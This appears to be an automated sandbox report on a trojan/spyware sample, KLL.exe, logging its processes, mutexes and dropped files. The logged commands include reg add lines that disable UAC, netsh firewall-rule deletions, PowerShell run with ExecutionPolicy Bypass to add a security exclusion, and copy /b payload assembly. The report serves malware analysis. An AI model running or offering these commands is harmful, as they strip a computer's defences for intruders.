Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CB2062D appears 44 times
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CC51CD0 appears 42 times
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CC51BBC appears 227 times
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CDFB6EF appears 202 times
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CC51BF0 appears 63 times
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: String function: 6CDFB75A appears 111 times

Source: System.Globalization.Extensions.dll.21.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: s.0.dr

Static PE information: No import functions for PE file found

Source: s.0.dr

Static PE information: Data appended to the last section found

Source: KLL.exe, 00000000.00000000.2165688898.00007FF797CFE000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQt5Widgets.dll( vs KLL.exe
Source: KLL.exe, 00000000.00000003.2268294121.00000208768E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameuc_ctrl.exe: vs KLL.exe
Source: KLL.exe, 00000000.00000003.2268188109.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameuc_ctrl.exe: vs KLL.exe
Source: KLL.exe, 00000000.00000003.2265156478.00000208788D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs KLL.exe
Source: KLL.exe, 00000000.00000002.2327236753.00007FF797ED4000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQt5Widgets.dll( vs KLL.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F

Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs	Security API names: directoryInfo.GetAccessControl
Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs	Security API names: fileInfo.SetAccessControl
Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs	Security API names: fileStream.GetAccessControl
Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs	Security API names: fileInfo.GetAccessControl
Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs	Security API names: directoryInfo.SetAccessControl
Source: System.IO.FileSystem.AccessControl.dll.21.dr, FileSystemAclExtensions.cs	Security API names: fileStream.SetAccessControl

Source: classification engine

Classification label: mal60.spre.troj.spyw.evad.winEXE@98/285@9/10

Source: C:\Users\user\Desktop\KLL.exe

Code function: 0_2_0000000180004BFC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,Sleep,SleepEx,CloseHandle,FindCloseChangeNotification,

0_2_0000000180004BFC

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_6CDD6CA0 _Statvfs,GetDiskFreeSpaceExW,

19_2_6CDD6CA0

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_00C63840 CreateToolhelp32Snapshot,Process32FirstW,_wcslwr_s,wcsstr,Process32NextW,

19_2_00C63840

Source: C:\Users\user\Desktop\KLL.exe

Code function: 0_2_00000001800044D4 CoInitialize,CoImpersonateClient,CoInitializeSecurity,CLSIDFromProgID,CoCreateInstance,VariantInit,VariantInit,VariantInit,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantClear,CoUninitialize,

0_2_00000001800044D4

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_00C66290 LoadResource,LockResource,SizeofResource,

19_2_00C66290

Source: C:\ProgramData\letsvpn-latest.exe

File created: C:\Program Files (x86)\letsvpn

Source: C:\Users\user\Desktop\KLL.exe

File created: C:\Users\user\AppData\Roaming\JM2KJ.bat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_03
Source: C:\Windows\System32\drvinst.exe	Mutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Mutant created: \Sessions\1\BaseNamedObjects\C__Program Files (x86)_letsvpn_app-3.7.0_Log_
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Mutant created: \Sessions\1\BaseNamedObjects\V 4 I
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Users\user\Desktop\KLL.exe	Mutant created: \Sessions\1\BaseNamedObjects\V? 5
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\MSDTC_STATS_EVENT
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03

Source: C:\ProgramData\letsvpn-latest.exe

File created: C:\Users\user\AppData\Local\Temp\nse575C.tmp

Source: C:\Users\user\Desktop\KLL.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\JM2KJ.bat"

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Command line argument: ..\data\skins\	19_2_00C66C80
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Command line argument: skin.xml	19_2_00C66C80
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Command line argument: SKINDATA	19_2_00C66C80
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Command line argument: SkinRes.dll	19_2_00C66C80
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Command line argument: uc.ini	19_2_00C66C80
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Command line argument: root_data_path	19_2_00C66C80
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Command line argument: language	19_2_00C66C80
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Command line argument: ..\language\	19_2_00C66C80

Source: KLL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor

Source: C:\Users\user\Desktop\KLL.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KLL.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LetsPRO.exe, 0000003C.00000002.4139617081.0000000067F37000.00000002.00000001.01000000.0000002E.sdmp	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: LetsPRO.exe, 0000003C.00000002.4139617081.0000000067F37000.00000002.00000001.01000000.0000002E.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: LetsPRO.exe, 0000003C.00000002.4139617081.0000000067F37000.00000002.00000001.01000000.0000002E.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: LetsPRO.exe, 0000003C.00000002.4139617081.0000000067F37000.00000002.00000001.01000000.0000002E.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: LetsPRO.exe, 0000003C.00000002.4139617081.0000000067F37000.00000002.00000001.01000000.0000002E.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: LetsPRO.exe, 0000003C.00000002.4139617081.0000000067F37000.00000002.00000001.01000000.0000002E.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: LetsPRO.exe, 0000003C.00000002.4139617081.0000000067F37000.00000002.00000001.01000000.0000002E.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: KLL.exe	ReversingLabs: Detection: 31%
Source: KLL.exe	Virustotal: Detection: 32%

Source: unknown	Process created: C:\Users\user\Desktop\KLL.exe "C:\Users\user\Desktop\KLL.exe"
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" -f C:\ProgramData\24g5n.xml
Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\JM2KJ.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\SQBg9\KQ3ts~m8\s+C:\ProgramData\SQBg9\KQ3ts~m8\a C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
Source: C:\Windows\System32\mmc.exe	Process created: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe "C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe"
Source: unknown	Process created: C:\Windows\System32\mmc.exe C:\Windows\system32\mmc.exe -Embedding
Source: C:\Windows\System32\mmc.exe	Process created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe"
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\oemvista.inf" "9" "4d14a44ff" "000000000000014C" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\letsvpn\driver"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000014C"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe	Process created: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
Source: unknown	Process created: C:\Windows\System32\wbem\WmiApSrv.exe C:\Windows\system32\wbem\WmiApSrv.exe
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE route print
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
Source: unknown	Process created: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe" /silent
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" -f C:\ProgramData\24g5n.xml	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\JM2KJ.bat"	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\SQBg9\KQ3ts~m8\s+C:\ProgramData\SQBg9\KQ3ts~m8\a C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process created: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe "C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe"	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Process created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe"	Jump to behavior
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }"
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
Source: C:\ProgramData\letsvpn-latest.exe	Process created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\oemvista.inf" "9" "4d14a44ff" "000000000000014C" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\letsvpn\driver"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000014C"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe	Process created: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE route print
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ARP.EXE arp -a

Source: C:\Users\user\Desktop\KLL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: textinputframework.dll	Jump to behavior
